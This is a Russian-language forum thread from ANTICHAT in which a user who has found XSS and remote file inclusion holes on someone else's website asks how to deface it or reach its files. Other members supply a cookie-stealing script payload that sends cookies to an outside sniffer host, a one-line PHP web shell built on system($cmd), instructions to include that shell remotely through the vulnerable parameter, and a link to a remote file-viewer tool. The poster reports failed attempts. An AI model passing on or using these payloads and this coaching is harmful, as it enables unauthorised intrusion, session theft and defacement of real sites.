HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу На сайте есть дырки. Помогите пожалуйста мне в дальнейшем
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

На сайте есть дырки. Помогите пожалуйста мне в дальнейшем
  #1  
Старый 19.02.2006, 20:28
Cnekmp
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами: 10643155

Репутация: 0
Question На сайте есть дырки. Помогите пожалуйста мне в дальнейшем
Нашел уязвимость. Выполняется JavaScript:

http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39



Потом просканил. Вот что мне выдал:

1) Серьезная уязвимость
Выполнение кода, взятого с удаленного сервера

Описание

Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting/...tp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.

2) Уязвимость
Реальный путь к серверу

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/interesting/...tp://wwwwwwww/

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/disks/index.php?pg=1'

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/audio/index.php?pg=1'

3) Доступна информация
Ссылки с параметрами
Описание

Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/interesting/index.php?pg=multios

/archive/index.php?pg=010402

/disks/index.php?pg=SeaMed

/audio/index.php?pg=Aopen

4) Доступна информация
Доступ к директориям
Описание

Доступные директории:
/admin/
/communications/
/proccesors/
/boards/
/video/
/disks/
/audio/
/security/
/interesting/
/archive/

5) Недоступные директории
Описание

Cуществующие, но недоступные директории:
/cgi-bin/
/forum/
/mp3/
/search/
/tmp/
/includes/
/img/


Помогите пожалуйста, каким образом можно добиться дефейса или же получить доступ к файлам?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.02.2006, 20:30
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
С нами: 10741286

Репутация: 1847


По умолчанию
А ты пробовал зайти в доступную admin/?
 
Ответить с цитированием

:)
  #3  
Старый 19.02.2006, 20:45
Cnekmp
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами: 10643155

Репутация: 0
По умолчанию :)
Цитата:
Сообщение от Trampled_clover  
А ты пробовал зайти в доступную admin/?

Да, доступ туда есть, там написано:

Администратор форума


Логин:
Пароль:



Тока не говори мне что Брутить надо что-то
мне сказали залить PHP шелл со своево сервака, но я не знаю как это сделать...
 
Ответить с цитированием

  #4  
Старый 19.02.2006, 20:52
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию
Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting...ttp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.

Ну раз есть такая дыра, то можно судя по всему выполнять команды. Ну вот эту брешь и юзай! Почитай статьи про php source injection и будет тебе счастье.
 
Ответить с цитированием

  #5  
Старый 19.02.2006, 21:43
Evolution
Познающий
Регистрация: 09.09.2005
Сообщений: 90
С нами: 10877527

Репутация: 22
По умолчанию
Цитата:
Сообщение от Cnekmp  
Нашел уязвимость. Выполняется JavaScript:
http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>
Цитата:
Сообщение от Cnekmp  
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)
 
Ответить с цитированием

  #6  
Старый 20.02.2006, 00:10
Cnekmp
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами: 10643155

Репутация: 0
По умолчанию
Цитата:
Сообщение от Evolution  
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>

и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)

1) Сниффер молчит....
Вот ответ на заливку сниффера:

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39

2) А как Шелл делать?
 
Ответить с цитированием

  #7  
Старый 20.02.2006, 00:19
Evolution
Познающий
Регистрация: 09.09.2005
Сообщений: 90
С нами: 10877527

Репутация: 22
По умолчанию
Цитата:
Сообщение от Cnekmp  
1) Сниффер молчит....
Вот ответ на заливку сниффера:

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39

2) А как Шелл делать?
снифер не надо ни куда заливать! ты должен дать ссылку(<script src="http://adressnifera"+document.cookie;></script>) и куки должны прити на твой снифер.
а шел мона просто скачать от сюда
а вообще не поленись зайти на яндекс/гугл и поискать что же такое шел и что делают со снифером!
 
Ответить с цитированием

  #8  
Старый 20.02.2006, 00:20
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию
<?
system($cmd);
?>

сохрани как shell.php и залей на народ


судя по твоим данным сцылка будет такого вида http://www.site.com:443/interesting/...narod.ru/shell
 
Ответить с цитированием

  #9  
Старый 20.02.2006, 00:47
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию
2Сnекmp

Юзай и это ...тоже полезная штука для твоего случия ))

http://antichat.ru/soft/remview.zip
 
Ответить с цитированием

  #10  
Старый 20.02.2006, 09:20
Cnekmp
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами: 10643155

Репутация: 0
По умолчанию
Попробовал все что вы сказали, через народ залить....
Может JavaScript-ом попробововать???

Вот ответ:

Warning: main(../interesting/info/http://cnekmp2005.narod.ru/remview.php.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/http://cnekmp2005.narod.ru/remview.php.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.